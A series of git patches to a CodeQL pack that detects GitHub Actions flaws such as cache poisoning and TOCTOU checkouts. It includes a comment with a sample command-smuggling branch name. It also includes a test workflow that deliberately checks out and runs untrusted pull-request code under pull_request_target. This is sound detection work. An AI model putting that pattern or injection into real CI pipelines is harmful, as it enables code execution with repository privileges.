a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 5db10e7823ee..f10a90ee6ee2 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -3,10 +3,16 @@ private import codeql.actions.DataFlow private import actions predicate workflowDataModel( - string path, string visibility, string job, string secrets_source, string permissions, + string path, string trigger, string job, string secrets_source, string permissions, string runner ) { - Extensions::workflowDataModel(path, visibility, job, secrets_source, permissions, runner) + Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) +} + +predicate repositoryDataModel( + string visibility, string default_branch_name +) { + Extensions::repositoryDataModel(visibility, default_branch_name) } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 529f7721e71b..34f0297d7998 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -24,6 +24,10 @@ extensible predicate sinkModel( ); extensible predicate workflowDataModel( - string path, string visibility, string job, string secrets_source, string permissions, + string path, string trigger, string job, string secrets_source, string permissions, string runner ); + +extensible predicate repositoryDataModel( + string visibility, string default_branch_name +); diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index ab0f2d0809a7..df2e1db3bdd0 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -10,17 +10,18 @@ string defaultBranchTriggerEvent() { ] } -string defaultBranchNames() { result = ["main", "master", "default"] } - predicate runsOnDefaultBranch(Job j) { exists(Event e | j.getATriggerEvent() = e and + exists(string default_branch_name | + repositoryDataModel(_, default_branch_name) + ) and ( e.getName() = defaultBranchTriggerEvent() and not e.getName() = "pull_request_target" or e.getName() = "push" and - e.getAPropertyValue("branches") = defaultBranchNames() + e.getAPropertyValue("branches") = default_branch_name or e.getName() = "pull_request_target" and ( @@ -30,18 +31,18 @@ predicate runsOnDefaultBranch(Job j) { // only branches-ignore filter e.hasProperty("branches-ignore") and not e.hasProperty("branches") and - not e.getAPropertyValue("branches-ignore") = defaultBranchNames() + not e.getAPropertyValue("branches-ignore") = default_branch_name or // only branches filter e.hasProperty("branches") and not e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = defaultBranchNames() + e.getAPropertyValue("branches") = default_branch_name or // branches and branches-ignore filters e.hasProperty("branches") and e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = defaultBranchNames() and - not e.getAPropertyValue("branches-ignore") = defaultBranchNames() + e.getAPropertyValue("branches") = default_branch_name and + not e.getAPropertyValue("branches-ignore") = default_branch_name ) ) ) diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index f9f983be6937..ca4a46b25d05 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -1,4 +1,10 @@ extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: repositoryDataModel + data: [ + - ["public", "main"] + ] - addsTo: pack: githubsecuritylab/actions-all extensible: workflowDataModel diff --git a/ql/test/library-tests/workflowenum.ql b/ql/test/library-tests/workflowenum.ql index 692d1eb706bc..b3dc9185ec4c 100644 --- a/ql/test/library-tests/workflowenum.ql +++ b/ql/test/library-tests/workflowenum.ql @@ -2,7 +2,7 @@ import actions import codeql.actions.dataflow.internal.ExternalFlowExtensions as Extensions from - string path, string visibility, string job, string secrets_source, string permissions, + string path, string trigger, string job, string secrets_source, string permissions, string runner -where Extensions::workflowDataModel(path, visibility, job, secrets_source, permissions, runner) -select visibility, path, job, secrets_source, permissions, runner +where Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) +select trigger, path, job, secrets_source, permissions, runner From f38af29f80f24ece46242b1c29d26ccd3d3fce55 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 09:36:18 +0000 Subject: [PATCH 280/707] Fix array --- ql/lib/ext/workflow-models/workflow-models.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index ca4a46b25d05..2293080d93eb 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -2,9 +2,8 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all extensible: repositoryDataModel - data: [ + data: - ["public", "main"] - ] - addsTo: pack: githubsecuritylab/actions-all extensible: workflowDataModel From cae29e0abe34af10186565c751a4a3c5affb4dd4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 10:03:17 +0000 Subject: [PATCH 281/707] temporary fix --- ql/lib/codeql/actions/security/CachePoisoningQuery.qll | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index df2e1db3bdd0..b60eb7da7613 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -1,4 +1,5 @@ import actions +import codeql.actions.dataflow.ExternalFlow string defaultBranchTriggerEvent() { result = From a2503dd14b8bf028a6f28fb3c4bc6d9355441f7c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 10:22:40 +0000 Subject: [PATCH 282/707] fix default_branch_name visibility --- .../actions/security/CachePoisoningQuery.qll | 50 +++++++++---------- 1 file changed, 25 insertions(+), 25 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index b60eb7da7613..69590a4a0de3 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -15,35 +15,35 @@ predicate runsOnDefaultBranch(Job j) { exists(Event e | j.getATriggerEvent() = e and exists(string default_branch_name | - repositoryDataModel(_, default_branch_name) - ) and - ( - e.getName() = defaultBranchTriggerEvent() and - not e.getName() = "pull_request_target" - or - e.getName() = "push" and - e.getAPropertyValue("branches") = default_branch_name - or - e.getName() = "pull_request_target" and + repositoryDataModel(_, default_branch_name) and ( - // no filtering - not e.hasProperty("branches") and not e.hasProperty("branches-ignore") - or - // only branches-ignore filter - e.hasProperty("branches-ignore") and - not e.hasProperty("branches") and - not e.getAPropertyValue("branches-ignore") = default_branch_name + e.getName() = defaultBranchTriggerEvent() and + not e.getName() = "pull_request_target" or - // only branches filter - e.hasProperty("branches") and - not e.hasProperty("branches-ignore") and + e.getName() = "push" and e.getAPropertyValue("branches") = default_branch_name or - // branches and branches-ignore filters - e.hasProperty("branches") and - e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = default_branch_name and - not e.getAPropertyValue("branches-ignore") = default_branch_name + e.getName() = "pull_request_target" and + ( + // no filtering + not e.hasProperty("branches") and not e.hasProperty("branches-ignore") + or + // only branches-ignore filter + e.hasProperty("branches-ignore") and + not e.hasProperty("branches") and + not e.getAPropertyValue("branches-ignore") = default_branch_name + or + // only branches filter + e.hasProperty("branches") and + not e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = default_branch_name + or + // branches and branches-ignore filters + e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = default_branch_name and + not e.getAPropertyValue("branches-ignore") = default_branch_name + ) ) ) ) From 1a4939a13ba37ccd1d6dac0a8bc6af63c8c28888 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 16:19:58 +0200 Subject: [PATCH 283/707] Apply suggestions from code review MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Alvaro Muñoz --- ql/lib/ext/workflow-models/workflow-models.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index 2293080d93eb..f71f2081c8fd 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -2,8 +2,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all extensible: repositoryDataModel - data: - - ["public", "main"] + data: [] - addsTo: pack: githubsecuritylab/actions-all extensible: workflowDataModel From 11edff936b2a66da31ae278b9f9efe6104c0d62f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 15:27:59 +0000 Subject: [PATCH 284/707] Fix tests --- .../actions/security/CachePoisoningQuery.qll | 63 +++++++++++-------- 1 file changed, 36 insertions(+), 27 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 69590a4a0de3..d2a5909206e3 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -11,39 +11,48 @@ string defaultBranchTriggerEvent() { ] } +string defaultBranchNames() { + exists(string default_branch_name | + repositoryDataModel(_, default_branch_name) and + result = default_branch_name + ) + or + not exist(string default_branch_name | + repositoryDataModel(_, default_branch_name) and + result = ["main", "master"] + ) +} + predicate runsOnDefaultBranch(Job j) { exists(Event e | j.getATriggerEvent() = e and - exists(string default_branch_name | - repositoryDataModel(_, default_branch_name) and + ( + e.getName() = defaultBranchTriggerEvent() and + not e.getName() = "pull_request_target" + or + e.getName() = "push" and + e.getAPropertyValue("branches") = defaultBranchNames() + or + e.getName() = "pull_request_target" and ( - e.getName() = defaultBranchTriggerEvent() and - not e.getName() = "pull_request_target" + // no filtering + not e.hasProperty("branches") and not e.hasProperty("branches-ignore") + or + // only branches-ignore filter + e.hasProperty("branches-ignore") and + not e.hasProperty("branches") and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() or - e.getName() = "push" and - e.getAPropertyValue("branches") = default_branch_name + // only branches filter + e.hasProperty("branches") and + not e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = defaultBranchNames() or - e.getName() = "pull_request_target" and - ( - // no filtering - not e.hasProperty("branches") and not e.hasProperty("branches-ignore") - or - // only branches-ignore filter - e.hasProperty("branches-ignore") and - not e.hasProperty("branches") and - not e.getAPropertyValue("branches-ignore") = default_branch_name - or - // only branches filter - e.hasProperty("branches") and - not e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = default_branch_name - or - // branches and branches-ignore filters - e.hasProperty("branches") and - e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = default_branch_name and - not e.getAPropertyValue("branches-ignore") = default_branch_name - ) + // branches and branches-ignore filters + e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = defaultBranchNames() and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() ) ) ) From 17a6d28e18db8b8c61e0ce9275570fc91e18e1f8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 15:37:17 +0000 Subject: [PATCH 285/707] Fix OR --- ql/lib/codeql/actions/security/CachePoisoningQuery.qll | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index d2a5909206e3..3cb84561b54c 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -18,9 +18,9 @@ string defaultBranchNames() { ) or not exist(string default_branch_name | - repositoryDataModel(_, default_branch_name) and - result = ["main", "master"] - ) + repositoryDataModel(_, default_branch_name) + ) and + result = ["main", "master"] } predicate runsOnDefaultBranch(Job j) { From 00052d1ea117af39d03fce6c71d3273421982277 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 15:37:57 +0000 Subject: [PATCH 286/707] exists --- ql/lib/codeql/actions/security/CachePoisoningQuery.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 3cb84561b54c..318548859b55 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -17,7 +17,7 @@ string defaultBranchNames() { result = default_branch_name ) or - not exist(string default_branch_name | + not exists(string default_branch_name | repositoryDataModel(_, default_branch_name) ) and result = ["main", "master"] From 6f87b755045f4b4121a3700efb11246a4081e540 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 17:44:16 +0200 Subject: [PATCH 287/707] Update test.yml --- .github/workflows/test.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 8b14b75062a5..96fd8bdd1a4b 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -1,6 +1,8 @@ name: Tests on: push: + branches: + - master pull_request: workflow_dispatch: From 731889bf88bde11f09ecf4039982cddf6cfc04ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 15 May 2024 21:29:51 +0200 Subject: [PATCH 288/707] Bump qlpack versions --- ql/lib/codeql/actions/security/SelfHostedQuery.qll | 5 +++-- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 3047ba35b064..03b6c87405e7 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -38,8 +38,9 @@ predicate staticallyIdentifiedSelfHostedRunner(Job job) { */ predicate dynamicallyIdentifiedSelfHostedRunner(Job job) { exists(string runner_info | - workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), - "public", job.getId(), _, _, runner_info) and + repositoryDataModel("public", _) and + workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), _, + job.getId(), _, _, runner_info) and runner_info.indexOf("self-hosted:true") > 0 ) } diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 54748d6fd623..7413744d3ff1 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.24 +version: 0.0.25 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 1b8d7e64028c..6bb27759f068 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.24 +version: 0.0.25 groups: - actions - queries From 446765bcbb4fc89d459d805cd2b97f2c17072c7a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 15 May 2024 22:08:03 +0200 Subject: [PATCH 289/707] Update Cache Poisoning rule --- ql/src/Security/CWE-349/CachePoisoning.ql | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 11da318f474d..0250d9aada1d 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -18,11 +18,10 @@ import codeql.actions.security.PoisonableSteps from LocalJob j, PRHeadCheckoutStep checkout, Step s where - // Excluding privileged workflows since they can be easily exploited in similar circumstances - not j.isPrivileged() and // The workflow runs in the context of the default branch runsOnDefaultBranch(j) and // The job checkouts untrusted code from a pull request + // TODO: Consider adding artifact downloads as a potential source of cache poisoning j.getAStep() = checkout and ( // The job writes to the cache @@ -33,7 +32,9 @@ where // The job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) checkout.getAFollowingStep() = s and - s instanceof PoisonableStep + s instanceof PoisonableStep and + // Excluding privileged workflows since they can be easily exploited in similar circumstances + not j.isPrivileged() ) select checkout, "Potential cache poisoning in the context of the default branch on step $@.", s, s.toString() From 888b9fecca8c9c3c1ee450139e7d19886906d26d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 10:28:24 +0200 Subject: [PATCH 290/707] Reduce FP for actor/association checks that cannot be bypassed this way --- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 2 +- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index c5e12c0fccc1..a3fcc9e0403d 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -15,7 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from ControlCheck check, MutableRefCheckoutStep checkout +from LabelControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index b74c3389f9d9..562fc0809b7a 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -15,7 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from ControlCheck check, MutableRefCheckoutStep checkout +from LabelControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and From c47fdd123d8db73c51ce9b3802daca1a06a3f43c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Thu, 16 May 2024 10:56:01 +0200 Subject: [PATCH 291/707] Create label_actor.yml --- .../CWE-367/.github/workflows/label_actor.yml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml new file mode 100644 index 000000000000..1debaecf97d3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml @@ -0,0 +1,17 @@ +# Making Label gates the only ones bypassable with TOCTOU races since actor or association ones should not be bypassable +name: Label Trigger Test +on: + pull_request_target: + types: [labeled] + branches: [main] + +jobs: + integration-tests: + runs-on: ubuntu-latest + if: github.repository_owner == 'npm' && github.actor == 'dependabot[bot]' + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: bash label_example/tests.sh From 1b4246e7f18fc947c67810f7370786bc7cf274ea Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 11:32:21 +0200 Subject: [PATCH 292/707] Update tests for cache poisoning --- ql/test/query-tests/Security/CWE-349/CachePoisoning.expected | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index f0ee6d700014..6bef24d86d79 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -6,5 +6,6 @@ | .github/workflows/test8.yml:12:9:15:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | | .github/workflows/test8.yml:23:9:26:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | | .github/workflows/test8.yml:34:9:37:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | +| .github/workflows/test11.yml:14:9:19:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Uses Step | | .github/workflows/test15.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Uses Step | | .github/workflows/test16.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Uses Step | From f325d40a2274d883986bef4c2ab8dff2a1943538 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 15:55:12 +0200 Subject: [PATCH 293/707] Ensure event sources are available for triggering events --- .../codeql/actions/dataflow/ExternalFlow.qll | 33 ++++++++-- .../codeql/actions/dataflow/FlowSources.qll | 63 ++++++++++++++++--- .../internal/ExternalFlowExtensions.qll | 18 ++++-- .../ext/workflow-models/workflow-models.yml | 48 ++++++++++++++ .../.github/workflows/pull_request_target.yml | 5 +- .../CWE-094/.github/workflows/self_needs.yml | 2 +- .../Security/CWE-094/CodeInjection.expected | 8 +-- .../CWE-094/PrivilegedCodeInjection.expected | 13 ++-- .../Security/CWE-094/action1/action.yml | 14 ----- 9 files changed, 154 insertions(+), 50 deletions(-) delete mode 100644 ql/test/query-tests/Security/CWE-094/action1/action.yml diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index f10a90ee6ee2..a52cc427d359 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -2,19 +2,42 @@ private import internal.ExternalFlowExtensions as Extensions private import codeql.actions.DataFlow private import actions +/** + * MaD models for workflow details + * Fields: + * - path: Path to the workflow file + * - trigger: Trigger for the workflow + * - job: Job name + * - secrets_source: Source of secrets + * - permissions: Permissions for the workflow + * - runner: Runner info for the workflow + */ predicate workflowDataModel( - string path, string trigger, string job, string secrets_source, string permissions, - string runner + string path, string trigger, string job, string secrets_source, string permissions, string runner ) { Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) } -predicate repositoryDataModel( - string visibility, string default_branch_name -) { +/** + * MaD models for repository details + * Fields: + * - visibility: Visibility of the repository + * - default_branch_name: Default branch name + */ +predicate repositoryDataModel(string visibility, string default_branch_name) { Extensions::repositoryDataModel(visibility, default_branch_name) } +/** + * MaD models for context/trigger mapping + * Fields: + * - trigger: Trigger for the workflow + * - context_prefix: Prefix for the context + */ +predicate contextTriggerDataModel(string trigger, string context_prefix) { + Extensions::contextTriggerDataModel(trigger, context_prefix) +} + /** * MaD sources * Fields: diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 08717c337875..063a3f671a32 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -95,8 +95,7 @@ private predicate branchEvent(string context) { // - They cannot contain a \ // eg: zzz";echo${IFS}"hello";# would be a valid branch name "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", - "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref", - "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.pull_request\\.head\\.ref", "github\\.event\\.workflow_run\\.head_branch", "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", "github\\.event\\.merge_group\\.head_ref", ] @@ -165,7 +164,8 @@ private predicate pathEvent(string context) { reg = [ // filename - "github\\.event\\.workflow\\.path", + "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.path", + "github\\.event\\.workflow_run\\.referenced_workflows\\.path", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -197,11 +197,33 @@ private predicate jsonEvent(string context) { ) } -class EventSource extends RemoteFlowSource { +class GitHubSource extends RemoteFlowSource { string flag; - EventSource() { - exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | + GitHubSource() { + exists(Expression e, string context, string context_prefix | + this.asExpr() = e and + context = e.getExpression() and + Utils::normalizeExpr(context) = "github.head_ref" and + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and + Utils::normalizeExpr(context).matches("%" + context_prefix + "%") and + flag = "branch" + ) + } + + override string getSourceType() { result = flag } +} + +class GitHubEventSource extends RemoteFlowSource { + string flag; + + GitHubEventSource() { + exists(Expression e, string context, string context_prefix | + this.asExpr() = e and + context = e.getExpression() and + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and + Utils::normalizeExpr(context).matches("%" + context_prefix + "%") + | titleEvent(context) and flag = "title" or urlEvent(context) and flag = "url" @@ -217,8 +239,33 @@ class EventSource extends RemoteFlowSource { usernameEvent(context) and flag = "username" or pathEvent(context) and flag = "filename" - or - jsonEvent(context) and flag = "json" + ) + } + + override string getSourceType() { result = flag } +} + +class GitHubEventJsonSource extends RemoteFlowSource { + string flag; + + GitHubEventJsonSource() { + exists(Expression e, string context | + this.asExpr() = e and + context = e.getExpression() and + ( + jsonEvent(context) and + ( + exists(string context_prefix | + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), + context_prefix) and + Utils::normalizeExpr(context).matches("%" + context_prefix + "%") + ) + or + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and + Utils::normalizeExpr(context).regexpMatch(".*\\bgithub.event\\b.*") + ) + ) and + flag = "json" ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 34f0297d7998..415c02dc1ba1 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -23,11 +23,19 @@ extensible predicate sinkModel( string action, string version, string input, string kind, string provenance ); +/** + * Holds if workflow data model exists for the given parameters. + */ extensible predicate workflowDataModel( - string path, string trigger, string job, string secrets_source, string permissions, - string runner + string path, string trigger, string job, string secrets_source, string permissions, string runner ); -extensible predicate repositoryDataModel( - string visibility, string default_branch_name -); +/** + * Holds if repository data model exists for the given parameters. + */ +extensible predicate repositoryDataModel(string visibility, string default_branch_name); + +/** + * Holds if context/trigger mapping exists for the given parameters. + */ +extensible predicate contextTriggerDataModel(string trigger, string context_prefix); diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index f71f2081c8fd..404e894a5f8a 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -7,3 +7,51 @@ extensions: pack: githubsecuritylab/actions-all extensible: workflowDataModel data: [] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: contextTriggerDataModel + data: + # This predicate maps triggering events with the github event context available for that event + - ["commit_comment", "github.event.comment"] + - ["discussion", "github.event.discussion"] + - ["discussion_comment", "github.event.comment"] + - ["discussion_comment", "github.event.discussion"] + - ["issues", "github.event.issue"] + - ["issue_comment", "github.event.issue"] + - ["issue_comment", "github.event.comment"] + - ["gollum", "github.event.pages"] + - ["merge_group", "github.event.merge_group"] + - ["pull_request", "github.event.pull_request"] + - ["pull_request", "github.head_ref"] + - ["pull_request_comment", "github.event.comment"] + - ["pull_request_comment", "github.event.pull_request"] + - ["pull_request_comment", "github.head_ref"] + - ["pull_request_review", "github.event.pull_request"] + - ["pull_request_review", "github.event.review"] + - ["pull_request_review", "github.head_ref"] + - ["pull_request_review_comment", "github.event.comment"] + - ["pull_request_review_comment", "github.event.pull_request"] + - ["pull_request_review_comment", "github.event.review"] + - ["pull_request_review_comment", "github.head_ref"] + - ["pull_request_target", "github.event.pull_request"] + - ["pull_request_target", "github.head_ref"] + - ["push", "github.event.commits"] + - ["push", "github.event.head_commit"] + - ["repository_dispatch", "github.event.client_payload"] + - ["workflow_dispatch", "github.event.inputs"] + - ["workflow_run", "github.event.workflow"] + - ["workflow_run", "github.event.workflow_run"] + # workflow_call receives the same event payload as the calling workflow + - ["workflow_call", "github.event.client_payload"] + - ["workflow_call", "github.event.comment"] + - ["workflow_call", "github.event.commits"] 